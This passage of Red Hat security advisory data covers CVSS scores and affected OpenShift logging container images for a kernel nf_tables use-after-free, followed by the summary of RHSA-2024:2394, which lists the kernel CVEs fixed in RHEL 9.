"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2024-05-30T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Important"
}
],
"title": "kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function"
}
]
}
rhsa-2024_2394
Vulnerability from csaf_redhat
Published
2024-04-30 09:57
Modified
2024-12-11 16:40
Summary
Red Hat Security Advisory: kernel security, bug fix, and enhancement update
Notes
Topic
An update for kernel is now available for Red Hat Enterprise Linux 9.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
The kernel packages contain the Linux kernel, the core of any Linux operating system.
Security Fix(es):
* kernel: GSM multiplexing race condition leads to privilege escalation (CVE-2023-6546)
* kernel: multiple use-after-free vulnerabilities (CVE-2024-1086, CVE-2023-3567, CVE-2023-4133, CVE-2023-6932, CVE-2023-39198, CVE-2023-51043, CVE-2023-51779, CVE-2023-51780, CVE-2024-1085, CVE-2024-26582)
* kernel: Bluetooth BR/EDR PIN Pairing procedure is vulnerable to an impersonation attack (CVE-2020-26555)
* kernel: memcg does not limit the number of POSIX file locks allowing memory exhaustion (CVE-2022-0480)
* kernel: multiple NULL pointer dereference vulnerabilities (CVE-2022-38096, CVE-2023-6622, CVE-2023-6915, CVE-2023-42754, CVE-2023-46862, CVE-2023-52574, CVE-2024-0841, CVE-2023-52448)
* kernel: integer overflow in l2cap_config_req() in net/bluetooth/l2cap_core.c (CVE-2022-45934)
* kernel: netfilter: nf_tables: out-of-bounds access in nf_tables_newtable() (CVE-2023-6040)
* kernel: GC's deletion of an SKB races with unix_stream_read_generic() leading to UAF (CVE-2023-6531)
* kernel: Out of boundary write in perf_read_group() as result of overflow a perf_event's read_size (CVE-2023-6931)
* kernel: Bluetooth Forward and Future Secrecy Attacks and Defenses (CVE-2023-24023)
* kernel: irdma: Improper access control (CVE-2023-25775)
* Kernel: double free in hci_conn_cleanup of the bluetooth subsystem (CVE-2023-28464)
* kernel: Bluetooth: HCI: global out-of-bounds access in net/bluetooth/hci_sync.c (CVE-2023-28866)
* kernel: race condition between HCIUARTSETPROTO and HCIUARTGETPROTO in hci_uart_tty_ioctl (CVE-2023-31083)
* kernel: multiple out-of-bounds read vulnerabilities (CVE-2023-37453, CVE-2023-39189, CVE-2023-39193, CVE-2023-6121, CVE-2023-39194)
* kernel: netfilter: race condition between IPSET_CMD_ADD and IPSET_CMD_SWAP (CVE-2023-42756)
* kernel: lib/kobject.c vulnerable to fill_kobj_path out-of-bounds write (CVE-2023-45863)
* kernel: smb: client: fix potential OOBs in smb2_parse_contexts() (CVE-2023-52434)
* kernel: mm/sparsemem: fix race in accessing memory_section->usage (CVE-2023-52489)
* kernel: net: fix possible store tearing in neigh_periodic_work() (CVE-2023-52522)
* kernel: multiple memory leak vulnerabilities (CVE-2023-52529, CVE-2023-52581)
* kernel: net: bridge: data races indata-races in br_handle_frame_finish() (CVE-2023-52578)
* kernel: net/core: kernel crash in ETH_P_1588 flow dissector (CVE-2023-52580)
* kernel: net/sched: act_ct: fix skb leak and crash on ooo frags (CVE-2023-52610)
* kernel: CIFS Filesystem Decryption Improper Input Validation Remote Code Execution Vulnerability in function receive_encrypted_standard of client (CVE-2024-0565)
* kernel: tls: race between async notify and socket close (CVE-2024-26583)
* kernel: tls: handle backlogging of crypto requests (CVE-2024-26584)
* kernel: tls: race between tx work scheduling and socket close (CVE-2024-26585)
* kernel: mlxsw: spectrum_acl_tcam: Fix stack corruption (CVE-2024-26586)
* kernel: i2c: i801: Fix block process call transactions (CVE-2024-26593)
* kernel: sched/membarrier: reduce the ability to hammer on sys_membarrier (CVE-2024-26602)
* kernel: netfilter: nf_tables: reject QUEUE/DROP verdict parameters (CVE-2024-26609)
* kernel: local dos vulnerability in scatterwalk_copychunks (CVE-2023-6176)
* kernel: perf/x86/lbr: Filter vsyscall addresses (CVE-2023-52476)
* kernel: netfilter: nf_tables: disallow timeout for anonymous sets (CVE-2023-52620)
* kernel: ip6_tunnel: fix NEXTHDR_FRAGMENT handling in ip6_tnl_parse_tlv_enc_lim() (CVE-2024-26633)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.4 Release Notes linked from the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.